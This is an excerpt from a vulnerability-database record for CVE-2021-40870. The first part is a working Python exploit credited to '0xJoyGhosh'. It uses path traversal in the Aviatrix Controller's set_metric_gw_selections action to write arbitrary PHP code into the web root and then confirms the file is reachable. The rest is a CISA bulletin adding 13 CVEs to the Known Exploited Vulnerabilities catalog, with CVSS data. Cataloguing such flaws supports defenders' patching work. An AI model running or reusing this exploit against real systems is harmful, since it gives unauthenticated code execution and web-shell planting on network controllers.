\u2588\u2580\u2580\u2588 \n\u2591\u2588\u2500\u2500\u2500 \u2500\u2591\u2588\u2591\u2588\u2500 \u2591\u2588\u2580\u2580\u2580 \u2580\u2580 \u2500\u2584\u2580 \u2588\u2584\u2580\u2588 \u2500\u2584\u2580 \u2500\u2588\u2500 \u2580\u2580 \u2588\u2584\u2584\u2588\u2584 \u2588\u2584\u2580\u2588 \u2584\u2580\u2580\u2584 \u2588\u2584\u2584\u2500 \u2588\u2584\u2580\u2588 \n\u2591\u2588\u2584\u2584\u2588 \u2500\u2500\u2580\u2584\u2580\u2500 \u2591\u2588\u2584\u2584\u2584 \u2500\u2500 \u2588\u2584\u2584 \u2588\u2584\u2584\u2588 \u2588\u2584\u2584 \u2584\u2588\u2584 \u2500\u2500 \u2500\u2500\u2500\u2588\u2500 \u2588\u2584\u2584\u2588 \u2580\u2584\u2584\u2580 \u2580\u2584\u2584\u2580 \u2588\u2584\u2584\u2588 \nAuthor : 0xJoyGhosh \nOrg : System00 Security \nTwitter: @0xjoyghosh \n \n\"\"\") \ntry: \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", \"--url\", help=\"Enter Target Url With scheme Ex: -u https://avaitix.target.com\", type=str) \nparser.add_argument(\"-c\", \"--code\", help=\"Enter php code Ex: -c '<?php phpinfo(); ?>' \", type=str) \nparser.add_argument(\"-n\", \"--name\", help=\"Enter php code Ex: -n 'filename' \", type=str) \nargs = parser.parse_args() \nurl =f\"{args.url}/v1/backend1\" \nexcept TypeError: \nprint(\"Type -h To See all the options\") \nexcept(): \nexit() \ndef exploit(url,path,code): \nheaders = CaseInsensitiveDict() \nheaders[\"Content-Type\"] = \"application/x-www-form-urlencoded\" \ndata = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}' \nresp = requests.post(url, headers=headers, data=data,verify=False) \nstat = requests.get(f\"{args.url}/v1/{path}\",verify=False) \nif resp.status_code==200: \nif stat.status_code==200: \nprint(f\"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]\") \nprint(\"\") \nelse: \nprint(\"[ Exploit successful Creating File Failed ]\") \npass \nelse: \nprint(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]') \n \nif args.url is not None: \nif args.code is not None: \nif args.name is not None: \nexploit(url,args.name,args.code) \nelse: \nprint('Type -h to see help Menu') \nelse: \nprint('Type -h to see help Menu') \nelse: \nprint('Type -h to see help Menu') \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164461/CVE-2021-40870.py.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-01-26T11:28:36", "description": "CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2021-32648 | October CMS Improper Authentication | 2/1/2022 \nCVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022 \nCVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022 \nCVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022 \nCVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022 \nCVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022 \nCVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022 \nCVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022 \nCVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022 \nCVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13671", "CVE-2020-13927", "CVE-2020-14864", "CVE-2021-21315", "CVE-2021-21975", "CVE-2021-22991", "CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-32648", "CVE-2021-33766", "CVE-2021-40870"], "modified": "2022-01-25T00:00:00", "id": "CISA:D7385BDD2786721598A2135E182282C2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}
CVE-2021-40870
